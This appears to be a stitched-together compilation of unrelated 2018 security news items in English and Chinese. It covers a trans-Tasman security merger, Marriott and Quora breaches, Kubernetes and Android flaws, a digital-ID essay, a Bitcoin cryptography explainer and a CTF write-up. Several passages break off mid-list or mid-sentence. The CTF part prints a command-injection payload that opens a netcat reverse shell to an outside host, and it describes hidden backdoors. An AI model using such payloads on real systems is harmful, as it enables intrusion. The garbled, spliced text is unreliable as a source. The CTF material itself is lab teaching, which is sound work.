IT security company Optic Security Group has launched in the Australian and New Zealand markets following a merger of six entities with combined revenues in excess of $100 million into a newly-formed entity.

The new company will operate across ANZ and says it will bring together the combined capability and expertise of industry-leading security businesses.

The new entity includes Australian-based companies Securities and Security & Technology Services and Bemac, and New Zealand-based physical security company Fortlock that recently acquired IT experts Comsmart, Circuit Systems and SSL.

Optic Security will be led by Group CEO, Jason Cherrington, who says “we are all living in a more connected world, where organisations are operating in an environment with increasing security demands, more volatility and more complexity”.

“Safeguarding people, information and technology has become much more complex and this rapidly changing risk profile is making the need to protect critical infrastructure against both physical and digital threats an absolute imperative.

“The formation of the Optic Security Group will enable us to meet the needs of customers as converging security requirements grow and become more complex, be they physical or digital. These threats are now exposing Directors to a complex liability that if not mitigated successfully lead to significant financial, criminal and brand damaging outcomes that Boards have to be fully aware of, and then protected against. That’s our purpose.

“We also had a particularly clear vision to create a trans-Tasman capability that has full geographic coverage across both markets and depth in technical and industry expertise to tackle these emerging challenges and deliver appropriate solutions to our customers now achievable with a scale presence in both Australia and New Zealand.”

Cherrington said the new company will immediately be able to provide additional services to the existing customers of the companies under the Optic Security umbrella, and the company will also partner with other leading players in the market such as the Cyber Audit team in Australia who provide independent information security and cybersecurity assessment.

Optic Security is billing itself as “Australia and New Zealand’s largest independent and most technically advanced physical, IT and information security group”.

Chris Giufre, Managing Director of New Zealand investment firm Ascentro Capital Partners, co-founded the Optic Security Group with Cherrington, and both founders will join the existing shareholders of the six businesses on the Optic shareholder register and become members of the board.

With 4 keynotes + 33 talks + 10 in-depth workshops from world-class speakers, YOW! is your chance to learn more about the latest software trends, practices and technologies and interact with many of the people who created them.

Speakers this year include Anita Sengupta (Rocket Scientist and Sr. VP Engineering at Hyperloop One), Brendan Gregg (Sr. Performance Architect Netflix), Jessica Kerr (Developer, Speaker, Writer and Lead Engineer at Atomist) and Kent Beck (Author Extreme Programming, Test Driven Development).

Register now for YOW! Conference

Sydney 29-30 November

Brisbane 3-4 December

Melbourne 6-7 December

Register now for YOW! Workshops

Sydney 27-28 November

Melbourne 4-5 December

REGISTER NOW!

Australia is a cyber espionage hot spot.

As we automate, script and move to the cloud, more and more businesses are reliant on infrastructure that has the high potential to be exposed to risk.

It only takes one awry email to expose an accounts’ payable process, and for cyber attackers to cost a business thousands of dollars.

In the free white paper ‘6 Steps to Improve your Business Cyber Security’ you’ll learn some simple steps you should be taking to prevent devastating and malicious cyber attacks from destroying your business.

Cyber security can no longer be ignored, in this white paper you’ll learn:

How does business security get breached?

What can it cost to get it wrong?

6 actionable tips

DOWNLOAD NOW!

12月3日，工信部网络安全管理局发布2018年第三季度网络安全威胁态势分析与工作综述。第三季度公共互联网网络安全形势依然严峻，发生多起严重危害用户合法权益的网络安全事件。工信部下一步工作重点包括：做好网络安全试点示范项目相关工作；开展移动恶意程序专项治理工作等。

第三季度，用户数据泄露事件多有发生，凸显加强网络安全防护重要性。第三季度，网曝多起用户数据泄露事件，涉及互联网、物流、酒店等多个行业企业，最高达上亿条信息记录，疑似是由于企业服务器或手持终端被植入恶意程序，以及内部安全管理机制不完善等问题导致。

工信部网络安全管理局提出，加强网络安全防护，包括排查风险隐患、强化防护技术手段、完善安全管理制度、落实网络安全责任等，已是企业履行用户数据保护责任的重要任务。

11月30日，万豪国际集团在其官方微博账号上表示，公司旗下的喜达屋酒店的一个客房预订数据库被黑客入侵，多达5亿人次的详细信息可能遭到泄露。该公司表示在今年9月就接到内部信息安全工具关于第三方试图访问喜达屋酒店预订数据库的风险警告。随着调查的深入，公司发现2014年数据库就曾被未经授权的第三方非法入侵过，复制并加密了某些信息。该公司已经向相关执法部门报告此事件，并继续调查。

有网络安全专家告诉记者，按照网络安全法，万豪这样大规模的信息泄露涉嫌违法，可能会被处罚。关于企业如何预防数据泄露，需要从系统建设开始，企业的重视程度也应该提升。

工信部表示，将开展移动恶意程序专项治理工作。为及时发现和消除移动恶意程序等网络安全威胁，维护广大网络用户的合法权益，组织各地通信管理局、基础电信企业、互联网企业、域名机构等单位开展针对移动恶意程序的专项治理工作。

第三季度，全行业共处置网络安全威胁约3397万个，包括恶意IP地址、恶意域名等恶意网络资源约653万个，木马、僵尸程序、病毒等恶意程序约2611万个，网络安全漏洞等安全隐患约4.8万个，主机受控、数据泄露、网页篡改等安全事件约127万个，其他网络安全威胁约1万个。

上述网络安全专家称，整体来说互联网企业走在网络安全的前列，传统行业在互联网化的过程中可能会遇到一些问题。“可能是经验不足，不了解黑客会对业务产生极大影响，再有就是预算不足，可能没想到还要做安全，往往是业务优先，还有一种可能是缺乏安全队伍和人才。”

此外，三季度上海市通信管理局针对51家互联网企业的网站、应用系统、移动应用程序等存在网络安全漏洞的情况，约谈了相关企业，并督促其及时整改漏洞、消除安全隐患；广东省通信管理局开展网站后门链接专项打击，清理非法植入的网站后门链接606个。（记者马婧）

As we approach a new year, it’s time for security professionals to think critically about the next challenges they will face and how these could impact their organization. Here are the seven things I expect organizations will run up against in 2019 as they try to protect their infrastructure.

in 2019.

Cryptomining will continue to be a threat as long as attackers can make quick cash from the infections. Be on the lookout and deploy endpoint and intrusion prevention tools designed to detect these exploits.

), and the smartphone authenticator apps will improve and integrate better into numerous mobile products.

Information security is all about protecting your organisation’s information, whether digitally or in hard copy. ISO 27000 which defines the key terms of ISO 27001, the international standard for information security management defines information security as the “preservation of confidentiality, integrity and availability of information”. After all, information has to be available to authorised persons, not disclosed to unauthorised persons, and accurate and complete for it to be useful and secure.

An information security policy is a crucial document for any organisation and its information security arrangements. The policy should be a short and simple document : a couple of pages that capture the organisation’s context including stakeholders’ requirements to bring it in line with ISO 27001. Keeping it simple will also allow for more flexibility to change it as the organisation’s needs and requirements evolve.

The information security policy should:

Your information security policy can also be a good document to share externally. Stakeholders including customers and partners will welcome the reassurance that their information is treated with respect and secure. It can also be a good document to show regulators, particularly if it features your SoA (Statement of Applicability) an ISO 27001 requirement that provides information about the exact controls in place. The introduction of the GDPR (General Data Protection Regulation), which applies to all organisations that process EU residents’ personal data, makes the policy and SoA even more crucial.

Stay secure with our risk assessment software tool vsRisk Standalone. Fully aligned with ISO 27001, vsRisk Standalone helps you deliver fast, accurate and hassle-free risk assessments.

It eliminates the need to use spreadsheets, which are prone to user input errors and can be difficult to set up and maintain. With vsRisk Standalone, you can produce consistent, robust and reliable risk assessments year after year.

注：本文翻译自 Brett Solomon 的文章《DIGITAL IDS ARE MORE DANGEROUS THAN YOU THINK》。

我在 “五条 | 创业者的日程表，数字身份的隐患，下拉菜单少用比较好” 中提到了本文，你可以点击链接阅读原文。

由于翻译人手增加，所以根据上上周末投票，选择上上周排名第二的本文进行翻译：

显然，有一个确定的、被认同的身份 ID 有现实意义上的好处。这就是为什么全世界都致力于实现“数字身份ID”的概念。从机场到健康记录系统，本着美好的期望，技术专家们和政策制定者将我们的身份数字化，这让现代生活更有效率也更便捷。

政府试图将数字化身份带入政务，向公民提供普适的行政服务。而银行业、旅游业、保险业则旨在利用数字化身份创造更流畅的产品服务体验。当然，数字化身份不仅仅能提升效率和商业价值。在叙利亚和约旦，难民们通常没有身份ID；如果他们能提供有效的身份证明，就可能更好地规划他们安置，财务和工作。

但是，作为一个在过去十年中不断追踪个人权利相关技术的优势并评估他们的风险的人，我仍然相信，数字身份是对我们个人权利构成最严重的技术风险之一。更糟糕的是，我们正在匆匆进入一个新技术不断涌现和融合的未来，这使得风险变得更严重。

最开始，我们建设了近乎完美的人脸识别技术和其它生物识别技术，包括了步态识别和虹膜识别。我们以不安全、不透明、中心化的方式建立了生物识别数据库。然后我们还建立地理位置特征数据库，用于实时追踪数字的“个体”。还有物联网，来自物联网的不安全数据不断上传，它们可能在未经你同意的情况下，将你（和你的身份）与网络上的其他身份和节点连接起来。

另外，我们建立的人工智能和机器学习系统会根据我们的身份做出决策。即使这些系统依赖的数据通常可能导致偏见和歧视，并且在不透明或缺乏审计的情况下被使用。最终，社会信用体系将基于数字身份技术影响我们的社会活动，就像中国现在这样。

通过这些与数字身份协同的技术，我们建立数字身份不仅是去获取基本社会服务了，而且将成为进入数字世界的条件。这不能帮你摆脱专制政府的目光。实际上他们正在努力分裂互联网，收集其中的数据和业务并本地化，对互联网实施监管和控制。数字身份系统已经足够成熟――成熟到可以利用和滥用――从而损害我们的自由和民主。

也许，我们可以做出另一种选择。在数字身份识别系统的设计和部署过程中倡导数据最小化、去中心化、保持数据一致性、受限的数据访问机制，以保护我们的基本权利。

首先，这意味着数字身份证不应强制使用。我们可以向使用数字身份证的要求说“不”，拒绝数字身份不应该对我们造成偏见或负面影响。

其次，我们的网络安全需要得到保护。印度的 Aadhaar计划――全国数字身份识别框架――也是世界上最大的――最近被证明存在严重的安全问题。如果数字身份系统必须能抵抗黑客攻击，那么它应该足够去中心化，并在设计上遵从公认的信息安全原则。一个身份在多个不同认证场景会导致普适的风险。同样，我们必须保持匿名能力。

再次，我们的数据需要被保护。既然政府是数据受托人，那么应该在数字身份的行政，立法和技术设计过程中，向数据保护机构、非政府法律专家、民间社会公开征集意见。就 Aadhaar 计划而言，从印度最高法院最近的一项裁决中，人们认识到：继续推动项目需要一个强大的数据保护框架。

然后，信息透明至关重要。数据使用不透明，就没有问责，也就没有途径解决侵犯私人数据权利的问题。

最后，国家部门对数据的访问必须遵守相关的国际法律标准，尤其是“必要和相称”原则：某一用途的个人信息，不应在缺乏法律标准约束的前提下被用于执法。

如果不建立必要的权利保护措施来降低数字身份系统的潜在伤害，我们就无法继续沿着目前的道路前进。我们的公民自由应该是构建数字身份识别技术、平台、系统的基础。否则，即使数字身份系统本来是为了我们大家的利益而创造，我们的基本权利也会在它的创造过程中崩溃。

本文的 PRESS.one 签名

Last Friday, Marriott sent out millions of emails warning of a massive data breach -- some 500 million guest reservationshad been stolen from its Starwood database. One problem: the email sender's domain didn't look like it came from Marriott at all . Marriott sent its notification email from " email-marriott.com ," which is registered to a third party firm, CSC , on behalf of the hotel chain giant. But there was little else to suggest the email was at all legitimate -- the domain doesn't load or have an identifying HTTPS certificate . In fact, there's no easy way to check that the domain is real, except a buried note on Marriott's data breach notification site that confirms the domain as legitimate. But what makes matters worse is that the email is easily spoofable.

Many others have sounded the alarm on Marriott's lackluster data breach response. Security expert Troy Hunt, who founded data breach notification site Have I Been Pwned , posted a long tweet thread on the hotel chain giant's use of the problematic domain. As it happens, the domain dates back at least to the start of this year when Marriott used the domain to ask its users to update their passwords. Williams isn't the only one who's resorted to defending Marriott customers from cybercriminals. Nick Carr , who works at security giant FireEye, registered the similarly named " email-mariott.com " on the day of the Marriott breach. "Please watch where you click," he wrote on the site. "Hopefully this is one less site used to confuse victims." Had Marriott just sent the email from its own domain, it wouldn't be an issue.

Wireless functionality has improved workplace efficiency and organisations are no longer restricted by cabling access. Unfortunately, many of these devices are poorly secured and rarely have their firmware updated.

The vulnerabilities in internet of things (IoT) devices have led to smart devices being part of botnets and incidents such as cardiac devices being vulnerable to hackers.

“The proliferation of IoT devices with poor security posture has increased the attack surface for threat actors dramatically,” says John Sheehy, vice-president of ioActive . “Compromised devices can be used by threat actors for anything from listening in on conversations and harvesting sensitive data, to cryptomining and jumping to traditional IT systems.”

Incidents where hackers have been able to exploit poor device security to obtain sensitive data have resulted in significant reputational damage, as happened to vTech in 2016. Such incidents could now under the Data Protection Act 2018 see companies fined.

As such attacks have become more frequent, the UK government has decided to step in. Earlier this year, the Department for Digital, Culture, Media and Sport (DCMS) published the Secure by Design report and later the Code of Practice for Consumer IoT Security a guidance document advising on the best practices for securing IoT devices.

These guidelines are currently voluntary and are broken down into thirteen steps, as follows:

The definition of a “timely manner” is incident-specific. However, 90 days is the standard for completion.

Industry reactions have been broadly positive, with HP and Centrica agreeing to abide by these recommendations. However, some recommendations are easier to implement than others.

“At the high level, the specific requirements outlined in the code of practice are exactly what needs to happen,” says Sheehy. “The challenge I see is that the devil is in the detail.”

First major security flaw in popular cloud container orchestrator Kubernetes discovered and it may be impossible to tell if you have been compromised

Find any firm at the forefront of digital transformation and there’s one thing you can bet on: it’s leveraging Kubernetes to deploy sophisticated applications that push the boundaries of modern-day application development.

Or, tobe technically precise, it’s using Kubernetes to orchestrate containerised applications enabling incredibly complex composite services comprising simpler microservices.

By solving the problem of container orchestration, a Kubernetes craze has taken hold of the cloud community, and itsrapid adoptionhas left its technical precursor, the container platform Docker, eating dust.

But since Kubernetes won the container war (sometime in 2017 after it allied with the Cloud Native Computing Foundation (CNFC)), the security stakes have been high. Having all your eggs in one basket meant that any major security breach could be messy.

It’s a problem that Kubernetes has largely managed to avoid in part thanks to its loyal following in the open source community. Indeed, the new security flaw was made prominent thanks to a post by a Google staff engineer on a public Kubernetes Google Group, was publicly disclosed on GitHub a week ago, and has been outlined in detail in a series of posts on Open Source patron Redhat’s website.

As outlined on Redhat’s website , the security hole or “privilege escalation flaw” is a nasty piece of work. In a nutshell, it makes it possible for any user to gain full administrator privileges on any compute node being run in a Kubernetes cluster.

Yes, you heard it right: that means any sensitive data can be stolen, malicious code injected, heck, if a hacker fancied it, they could just terminate an application altogether all from within the firm’s firewall. Yikes.

The vulnerability itself is located in the Kubernetes API server. Using a specially crafted connection request, the hacker can connect through the Kubernetes API server direct to the backend. Once in the network, they can then sendarbitrary requests over the same connection to the backend server.

Perhaps most alarmingly, the Kubernetes API server connections to the backend are all authenticated with Kubernetes Transport Layer Security (TLS) credentials meaning all the nefarious connections appear above board and applications functioning as normal.

The stark reality of the flaw asoutlined in the original Github post makes for some heavy reading for if you’re a Kubernetes user:

“There is no simple way to detect whether this vulnerability has been used. Because the unauthorized requests are made over an established connection, they do not appear in the Kubernetes API server audit logs or server log. The requests do appear in the kubelet or aggregated API server logs, but are indistinguishable from correctly authorized and proxied requests via the Kubernetes API server,” reads the post.

It doesn’t take a whole lot of hacking-nous or access privileges to take advantage of the flaw, either: “In default configurations, all users (authenticated and unauthenticated) are allowed to perform discovery API calls that allow this escalation,” continues the post.

Don’t be fooled into thinking your Kubernetes-based service or product is immune from the flaw. Just read this from Redhat :

“It’s important to note that all Kubernetes-based services and products including Red Hat OpenShift Container Platform, Red Hat OpenShift Online, and Red Hat OpenShift Dedicated are affected.”

Thankfully, as quickly as the flaw was detected it was resolved. Kubernetes has issued patched versions ofKubernetes v1.10.11 , v1.11.5 , v1.12.3 , and v1.13.0-rc.1. All prior versions remain exposed and users should stop using them immediately. Redhat has also issued patches and service updates to all affected Openshift users.

It remains to be seen whether the security flaw has been used to attack any Kubernetes user.

Google is more serious in updating the mobile platform. It’s one way of ensuring Android is always up-to-date on most mobile devices. However, it will still always depend on OEMs or mobile carriers to implement the update on different devices. We always check what’s in the Android Security Bulletin because we’re curious how our phones can be made better. As usual, it presents the possible security vulnerabilities and delivers the most recent security patch levels, particularly 2018-12-05. You are free to check the AOSP and see if the patches are available.

The latest Android Security Bulletin tackles a Media framework security vulnerability. The source is unknown but this one can allow an attacker to execute an arbitrary code even when remote. It can be done within the context of a privileged process as described by the developers.

The vulnerability can be exploited and affect a particular device. Any severity assessment will be based on whatever effect is present. It’s a good thing though there are no reports yet of abuse or active customer exploitation so before anything happens, make sure your Android device is updated.

The Android platform security includes Google Play Protect. Get the latest patch levels for your own peace of mind. Whether we admit it or not, exploitations in Android can happen.

Note this is almost the same as the Pixel / Nexus Security Bulletin available. Pixel and Nexus devices, and even the Essential Phone, are up for some functional improvements with the arrival of the 2018-12-05 security patch levels.

December's software release is here. Check your Essential Phone for the update. pic.twitter.com/tTaeQZ0kzl

― Essential (@essential) December 3, 2018

SOURCE: Android

Story Timeline October Android Security Bulletin ready for Pixel devices, Essential Phones Google and Android security adds further protection for backups Android Security updates required for at least two years

https://www.jianshu.com/p/ce3893a7be09

比特币的加密算法

常见的密钥加密算法类型大体可以分为三类：对称加密（单秘钥加密）、非对称加密、单向加密（结果唯一且计算过程可重复但是计算不可逆）

对称加密算法采用单密钥加密，在通信过程中，数据发送方将原始数据分割成固定大小的块，经过密钥和加密算法逐个加密后，发送给接收方；接收方收到加密后的报文后，结合密钥和解密算法解密组合后得出原始数据。由于加解密算法是公开的，因此在这过程中，密钥的安全传递就成为了至关重要的事了。而密钥通常来说是通过双方协商，以物理的方式传递给对方，或者利用第三方平台传递给对方，一旦这过程出现了密钥泄露，不怀好意的人就能结合相应的算法拦截解密出其加密传输的内容。

非对称加密算法采用公钥和私钥两种不同的密码来进行加解密。公钥和私钥是成对存在，公钥是从私钥中提取产生公开给所有人的，如果使用公钥对数据进行加密，那么只有对应的私钥才能解密，反之亦然。

例子：

发送方Bob从接收方Alice获取其对应的公钥，并结合相应的非对称算法将明文加密后发送给Alice；Alice接收到加密的密文后，结合自己的私钥和非对称算法解密得到明文。这种简单的非对称加密算法的应用其安全性比对称加密算法来说要高，但是其不足之处在于无法确认公钥的来源合法性以及数据的完整性。

算法特点：非对称加密算法具有安全性高、算法强度负复杂的优点，其缺点为加解密耗时长、速度慢，只适合对少量数据进行加密，其常见算法包括RSA、ECC

RSA 算法：

RAS 算法的安全性依赖于大数分解。大数分解是一个数学上公认的难题，比如说对于数字4, 000, 000, 000, 000, 000, 000, 000, 000, 000, 001=1, 199, 481, 995, 446, 957x3, 334, 772, 856, 269, 093，要找到2个素数来计算得出前面的数字式非常难。对于一些大数的分解，即使借助于计算机的运算，依然要非常长的时间。比如：对于200位的非特殊数字RSA200，2005年计算机花了18个月时间才把它分解成两个素数。可以看出RSA 算法的强度是非常高的，比较难以破解。

ECC算法：其数学基础是利用椭圆曲线上的有理点构成Abel加法群上椭圆离散对数的计算困难性。

单向加密算法常用于提取数据指纹，验证数据的完整性。发送者将明文通过单向加密算法加密生成定长的密文串，然后传递给接收方。接收方在收到加密的报文后进行解密，将解密获取到的明文使用相同的单向加密算法进行加密，得出加密后的密文串。随后将之与发送者发送过来的密文串进行对比，若发送前和发送后的密文串相一致，则说明传输过程中数据没有损坏；若不一致，说明传输过程中数据丢失了。单向加密算法只能用于对数据的加密，无法被解密，其特点为定长输出、雪崩效应。

实际的功能就是签名的过程，类似于MD5值对数据的相同性做保证，保证发送的明文没有被篡改过

发送者： 明文+单向加密后的签名，发送给接收者，接收者通过 明文+签名运算的出来的结果 和之前的签名做比对。比对成功，说明明文未被篡改，明文真实可靠，比对失败，则数据被改过。

常见的算法包括：MD5、sha1、sha224等等，其常见用途包括：数字摘要、数字签名等等。

实现原理：一般通过加密过程中，这种会丢掉一部分信息的加密方式被称为“单向加密”，来实现不可逆推算。

比如说：需要加密的数字 M，采用下面的加密规则进行加密。

比特币中采用了：SHA256和交易签名和交易确认，也就是单向加密和ECC非对称加密。

SHA256不仅仅是实现签名，还实现了MerkleTree的压缩的功能

SHA-256算法(Secure Hash Algorithm)

单向加密算法,一般通过加密过程中，丢掉一部分信息的加密方式被称为“单向加密”，来实现不可逆但是可重复且唯一的推算。

主要作用不是加密，而是做签名防止篡改，以及数据压缩得到体积更小的信息摘要。

通过传入一个最大长度不超过2^64 bit的参数，返回的字节的数组长度为32位byte数组，在golang当中，1byte =uint8，最大是255（2进制），最大是ff（16进制），也就是1个byte可以表示255种不同的字符，比如 0-9 a-z A-Z 符号们，而uint8的最大值用16进制表示的话，是ff，刚好2位，所以1个32位的byte数组，正好用64位的16进制数字表示。

比特币使用的加密算法被称之为椭圆曲线算法（ECC），是一种著名的非对称算法。相较于另一种著名的非对称算法RSA，ECC算法的数学理论非常深奥和复杂，在工程应用中比较难于实现，但它的单位安全强度相对较高。由于ECC 算法数学理论深奥，难以被一般民众掌握，为了便于说明，本文将对RSA 算法的原理进行说明，以使大家对比特币加密算法有个深入的了解。

挑战 1 废弃的筒仓

类别： Web

这个挑战题目的页面向我们展示了一个表单，在输入框可以指定参数来 ping 我们输入的 ip 。页面提供了一个线索，告知我们 flag 在文件 flag.txt 中。

我们尝试注入使用netcat建立反向连接的命令，127.0.0.1;nc reverse.sistec.es 8080。

我们验证了反向连接已经成功建立，我们可以通过这个反向的 shell 来读取保存 flag 的 flag.txt 文件。

我们成功读取到了服务器上的 flag 。

挑战 2 PARANORMALGLITCH

类别：电子取证

这道题目是在 JPG 图像中找到 flag 。为方便起见，我们将使用 gatos.jpg 作为要分析的文件的名称。

该文件的大小是 670081 字节，

我们 可以使用一些签名搜索工具，例如binwalk，photorec和或者是foremost。

使用foremost工具，我们得到了相同的JPG图 像，但大小为 196951 字节。我们怀疑在 JPG 图像之后还隐藏着另一个文件或重要数据。

我们从偏移量 196951 中提取数据

我们分 析这个新的文件part2。很快，我们就看到有IHDR和IDAT 字符串的存在，所以，看起来我们找到的这个文件应该是一个 PNG 图片。

我们将此文件的开头与另一个 PNG 文件或维基百科中显示的示例图片进行比较。

我们看到这个文件丢失了 PNG 文件头的前 4 个字节（因此数据恢复程序没有识别出这是个 PNG 图片文件）。我们 用xxd和cat把文件头的前四个字节添 加进去。

这个图片 文件不是100％的正确，并且不是所有的看图软件都能正常打开，即使是这种情况，我们也可以使用GIMP正常打开查看图片并获得flag。

挑战 3 后门分析 1

类别：电子取证

接下来的题目是分析一个操作系统是 Ubuntu 16.04 的受感染的虚拟机。

我们使用用户 ctf 访问服务器，然后使用 su 命令切换到服务器的管理员用户来进行更彻底的分析。

一开始我们收到一条错误的消息，这条错误信息告诉我们有一些东西被感染了。

在 .bashrc 文件的末尾我们看到有一个可执行文件，隐藏的是方式是尝试使用多次换行。

我们分析这个二进制文件并使用 ltrace 观察如何生成 flag 的字符串。

挑战 4 后门分析 2

类别：电子取证

第二个后门是我在使用 ps 查看了正在运行的进程后找到的。

我们分析二进制文件 /usr/sbin/psl 并使用 strings 获取到 base64 编码过的字符串。

使 用Auto Solver里的PatataUtils工具类，我们解码了base64的内容并获得了flag。

在复杂的编码方式中，必须使用XOR0x33对文本进行解 密 / 解码。

PS ：受感染的二进制文件是 /bin/ls

挑战 5 网络犯罪分析

类别：电子取证

在此挑战中，我们被要求分析恶意软件 do_not_remove.bat 然后找到 flag 。

在第一次分析中，我们发现它是一个 powershell 脚本，它执行了 Base64 中编码过的代码。

我们解码 base64 中的文本得到了一个二进制文件，如果我们查看代码，我们接下来回看到程序是如何使用 CompressionDeflateStream 函数的。

此代码中最可疑的部分是在 User-Agent 中发送的十六进制字符串。在尝试对其进行解码之后，我们可以发现，从 1f 8b 08 00 字节开始是另一个 gzip 文件 。

挑战 6 ARMOURED KITTEN

类别：逆向

这个题目是逆向一个 ARM64 的二进制文件获得 flag 。

我们首先遇到的第一个困难是我们无法在 x64 架构的机器上原生的执行这个二进制文件。我们可以安装 qemu 来执行并调试这个程序。

当我们执行二进制文件时，程序会等待我们输入一些文本并检查输入的内容是否正确。

使用反汇编程序（ r2 ， gdb ， IDA ）分析二进制文件时，我们看到输入正确的内容时程序输出的文本是

我们使用 IDA X-Rays 来反编译代码并进一步理解二进制文件的操作。

BELLEVUE, Wash., December 4, 2018 Auth0, a global leader in Identity-as-a-Service (IDaaS), today announced it has achieved Gold CSA Star certification from the Cloud Security Alliance (CSA) , signifying that the company has surpassed rigorous third party independent assessment of its security as a cloud service provider.

CSA STAR is the industry’s most powerful program for security assurance in the cloud. There are 11 controls areas that dictate certification level, including compliance, data governance, facility security, human resources, information security, legal, operations management, risk management, release management, resiliency, and security architecture. Auth0 has achieved the highest level of Gold for the Level 2 audit.

“In this predominantly cloud-centric environment, it is critical that companies can rest assured that their vendors have gone through all of the steps necessary to be as secure as they can be,” said Joan Pepin, CISO and VP of Business Operations at Auth0. “We are pleased to have achieved this level of CSA STAR certification and will continue to invest in standards like these to provide the most secure solution possible.”

Auth0’s CSA STAR certification can be downloaded from the CSA Registry here: https://cloudsecurityalliance.org/star/registry/auth0/ . For more information about Auth0’s approach to security, please visit: https://auth0.com/security .

Auth0, a global leader in Identity-as-a-Service (IDaaS), provides thousands of enterprise customers with a Universal Identity Platform for their web, mobile, IoT, and internal applications. Its extensible platform seamlessly authenticates and secures more than 1.5B logins per month, making it loved by developers and trusted by global enterprises. The company's U.S. headquarters in Bellevue, WA, and additional offices in Buenos Aires, London, Tokyo, and Sydney, support its customers that are located in 70+ countries.

For more information, visithttps://auth0.com or follow @auth0 on Twitter .

Jeana Tahnk

Corporate Communications

Auth0

In the modern world, we do a lot of work on the internet. Some people build entire businesses which operate online. This can lead to some very successful enterprises, and some companies wind up being known all around the world.

However, the internet has a dark side. Like every gripping story, a hidden villain is lurking in the wings, waiting for the best time to strike. The villain of this story is known as identity theft.

What a lot of people don’t know is that when you go online, you’re putting yourself at risk of having your identity stolen and used to commit crimes or spend a lot of money. And all the ramifications and consequences for the use of your identity are put onto you. To try and prevent this from happening, we’re going to be looking at how you can protect yourself from identity theft.

Identity theft is a significant source of problems for the internet. Not only does it put the everyday user at risk, but it can damage business-to-customer trust and create situations which are hard to get out of. To protect your credit and identity , you need to understand what identity theft actually is.

Identity theft can be a complex problem because sometimes people aren’t even after your money, just your identity. They can sell it on to others, or use it to take out loans and make investments. Because there’s no real single motive for this kind of crime, it means that identity thieves can target all different types of people, not just those people who have a lot to take. This makes combating this threat that bit more difficult.

Another problem to watch out for is that there are no indicators that you’ve been hacked and your personal information taken until it’s too late. Many people are only aware of what’s going on when they’re either presented with a large bill, or their card is declined.

Understanding how identity theft works is one thing, but knowing how they can take your information? That’s knowledge you can’t put a price on. There are many different ways a thief might steal personal details from you, so it’s important to know the most common methods.

Sometimes, the theft can take place in real life without you even knowing. In busy places where no one’s watching them, people will go looking through your trash to collect personal information from bills or letters. This means that you need to shred everything with personal information on it, as so not to take that risk.

However, the online world is where the majority of the attacks will take place, so you need to make sure that you’re ready for them in whatever form they take. The most common method you’ll run up against is phishing. This can take many different forms, whether it’s a phone call, an email or a text message.

Whatever the medium, you’ll notice that these messages will always say a similar sort of thing. You’ll be told that there’s a problem with your account and that you need to make sure you log in and verify your details. However, if you made an attempt to contact the company that the thieves are pretending to be, they would claim to have no knowledge of an issue.

However, it is also worth noting that there many other ways in which a hacker can gain access to your personal information. They could, of course, try the more direct route, and just hack you. They’ll bypass the security protocols you have installed on your system, and gain entry to the most secure files on your computer or mobile.

Specifically, they’ll be looking for passwords, customer information, credit card details. All things they can use to build a profile of you. A profile they can then use to masquerade as you.

However, we’re sorry to say that this isn’t even the end of the problem. If you’ve invested details into a company, like an online bank or any other website which demands personal information, that site is at risk. That’s right ― companies are hacked all the time. If it’s a particularly big one, you might well hear a news story about it. But these companies have your information. And it’s easily accessed by crooks and hackers if they want it.

Now that we’ve established the threats and indeed the methods, we now need to understand how to protect ourselves. You don’t want to come under threat from hackers, or to have your personal information taken from you. So what do you do to prevent it?

Thankfully, there are quite a few things that you can do to protect yourself. Obviously, you can invest in a shredder for those files which are outside and left in the rubbish. However, the online world requires more protection and a more sophisticated means of keeping yourself safe.

Secure your accounts online. Always, if possible, set up two-step verification. This will allow you to be notified if someone attempts to gain access to your account, and will block them from doing so. Always make sure that you have access to reputable anti-virus software. It will help to prevent incoming attacks and viruses and help to keep your personal information safe.

Internet Security In The Modern Age

Sadly in today’s world Internet Security doesn’t just mean having Anti-Virus Software and a strong Firewall. While… hackernoon.com

10 smart tricks hackers use to steal your cryptos (and how to protect from them)

For consumers and crypto buyers, the crypto-jungle is a real mess as far as security is concerned. hackernoon.com

It’s also imperative to be vigilant when you are online. Routinely check your personal information, make sure that there have been no unauthorized logins, no suspicious activity on the account. This will help to keep you safe from hackers and give you an early warning if something is happening.

Some people even consider looking for an identity theft protection system. Something that notifies you immediately when you are at risk of having your information stolen. This means that you can easily block the thieves, either by canceling your bank account or by notifying a company that you aren’t making that purchase.

To summaries, these are just a few of the different things that you need to know if you are going to protect yourself from identity theft adequately. It’s a widespread occurrence in the modern world, and you don’t want to be the next person to have your information stolen.

There’s no telling the damage which could be caused if someone were to gain access to your account, which is why you have to be consistent when you check for problems and issues. You need to act quickly if you suspect anything because identity theft is not something you can afford to mess around with.

If you thought you were safe using privacy coins like Zcash and Monero you might want to think again.

It appears that the US Department of Homeland Security (DoHS) is looking to develop forensic analysis techniques for privacy-focused cryptocurrencies like Zcash and Monero, according to a pre-solicitation document spotted by The Block .

The document was published by the the DoHS’s Small Business Innovation Research Program (SBIR), and outlines a proposal that is encouraging small businesses to develop research, process, products, and technologies that create techniques that can be used to detect and uncover crimes where cryptocurrencies have been used.

The “ proposal calls for solutions that enable law enforcement investigations to perform forensic analysis on blockchain transactions,” the document reads.

The SBIR lays out a three stage process for developing the forensic tools, with the first phase being to design a blockchain analysis system that “enables forensic analysis for homeland security and law enforcement applications for cryptocurrencies, such as Zcash and Monero.”

The second phase is to prototype these tools using test data, to demonstrate how they would be used by authorities. The third and final phase will be integration of these forensic tools into commercial or governmental applications, which will allow the authorities to track and trace cryptocurrency transactions and hopefully catch cyber-criminals.

It should be noted that this is a pre-solicitation document, meaning it is opening the floor for any SBIR registered businesses to ask questions about the proposal. It’s not an invitation for product proposals yet. These are likely to come towards early 2019, as the solicitation period comes to a close on December 18.

It’s perhaps no surprise that the DoHS is focusing on Zcash and Monero. These two coins are known for being used byterrorist organizations,crypto-jackers, andcyber-criminals as they offer more privacy options than more conventional cryptocurrencies. But it looks like they won’t be so private for much longer, if the DoHS gets its way.

Published December 4, 2018 ― 12:19 UTC

A security incident at Quora potentially compromised the personal information and other details of approximately 100 million users.

On 30 November, the question-and-answer website identified that a third party had gained access to one of its systems and compromised the data of 100 million users. The information potentially exposed by the incident included users’ names, email addresses, hashed passwords and data imported from linked networks. The security event might have also revealed users’ public and non-public activity including their questions, answer requests, comments and direct messages.

After discovering the unauthorized activity, Quora launched an investigation with its own internal security teams, retained a digital forensics firm and notified law enforcement. It also invalidated the passwords of all affected users as it began making security improvements to its systems and notifying users whose data might have been compromised.

Adam D’Angelo, chief executive officer at Quora, expressed remorse for the inconvenience caused by the incident. As he wrote in a security update :

